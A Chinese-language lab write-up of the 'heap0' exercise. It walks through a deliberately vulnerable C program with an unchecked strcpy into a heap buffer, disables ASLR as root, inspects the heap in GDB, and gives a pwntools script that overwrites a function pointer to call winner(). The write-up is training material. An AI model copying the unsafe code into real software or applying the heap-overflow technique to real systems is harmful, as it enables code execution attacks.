easy -heap

源码

  #include<stdlib.h>
  #include<unistd.h>
  #include<string.h>
  #include<sys/types.h>

  struct data
  {
        	char name[64];
  };
  struct fp
  {
      int (*fp)();

  };
  void winner()
  {
      printf("level passed
");
  }
  void nowinner()
  {
      printf("level has not been passed
");
  }

  int main (int argc ,char ** argv)
  {
      struct data *d;
      struct fp *f;
      d=malloc(sizeof(struct data));
      f=malloc(sizeof(struct fp));
      f->fp=nowinner;
      printf("data is at %p,fp is at %p
",d,f);
      strcpy (d->name,argv[1]);
      f->fp();
  }

程序是将argv[1]copy到d->name(heap区域)，但是没有检查程度，从而可能是f->fp被覆盖，

编译

  gcc heap0.c -w -m32 -g -no-pie -z execstack -o heap0

执行一下

      chen@ubuntu:~$ ./heap0 HELLO
      data is at 0x8715008,fp is at 0x8715050
      level has not been passed
      chen@ubuntu:~$ ./heap0 HELLO
      data is at 0x929b008,fp is at 0x929b050
      level has not been passed

两次的地址不同，所以应该是没关ALSR

     chen@ubuntu:~$ sudo su -
      [sudo] password for chen: 
      root@ubuntu:~# echo 0 > /proc/sys/kernel/randomize_va_space

在执行并输入argv参数

chen@ubuntu:~$ ./heap0 HELLO
data is at 0x804b008,fp is at 0x804b050
level has not been passed
chen@ubuntu:~$ ./heap0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
data is at 0x804b008,fp is at 0x804b050
Segmentation fault (core dumped)

GDB

gdb ./heap0
list 1,35
b 33
run AAAA

info proc map  //查看heap的虚拟内存地址来找到AAAA
x/200wx    start of heap     

再离AAAA不远处有一个可疑的地址，查看一下,发现是nowinner()函数的地址

覆盖地址

gdb ./heap0
list 1,35
b 33
run AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRXYZA

gdb-peda$ x/200wx  0x804b000 
0x804b000:	0x00000000	0x00000049	0x41414141	0x42424242
0x804b010:	0x43434343	0x44444444	0x45454545	0x46464646
0x804b020:	0x47474747	0x48484848	0x49494949	0x4a4a4a4a
0x804b030:	0x4b4b4b4b	0x4c4c4c4c	0x4d4d4d4d	0x4e4e4e4e
0x804b040:	0x4f4f4f4f	0x50505050	0x51515151	0x52525252
0x804b050:	0x415a5958	0x00000000	0x00000000	0x00000409
...
gdb-peda$ c
Continuing.

Program received signal SIGSEGV, Segmentation fault

[----------------------------------registers-----------------------------------]
EAX: 0x415a5958 ('XYZA')
EBX: 0xffffd000 --> 0x2 
ECX: 0xffffd2d0 ("RRRRXYZA")
EDX: 0x804b04c ("RRRRXYZA")
ESI: 0xf7fb7000 --> 0x1afdb0 
EDI: 0xf7fb7000 --> 0x1afdb0 
EBP: 0xffffcfe8 --> 0x0 
ESP: 0xffffcfcc --> 0x804853f (<main+114>:	mov    eax,0x0)
EIP: 0x415a5958 ('XYZA')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)

可见eip已被改变

##小型脚本（python）

#!/usr/bin/python
from pwn import*
addr= 0x0804849b #0x080484b4 this is nowinner

payload="A"*72+p32(addr)
print payload

结果

chen@ubuntu:~$ ./heap0 $(./hh.py)
data is at 0x804b008,fp is at 0x804b050
level passed

参考：

https://samsclass.info/127/proj/p7-heap0.htm
https://www.cnblogs.com/Ox9A82/p/5483186.html
https://www.bilibili.com/video/BV1W4411j7L5?p=5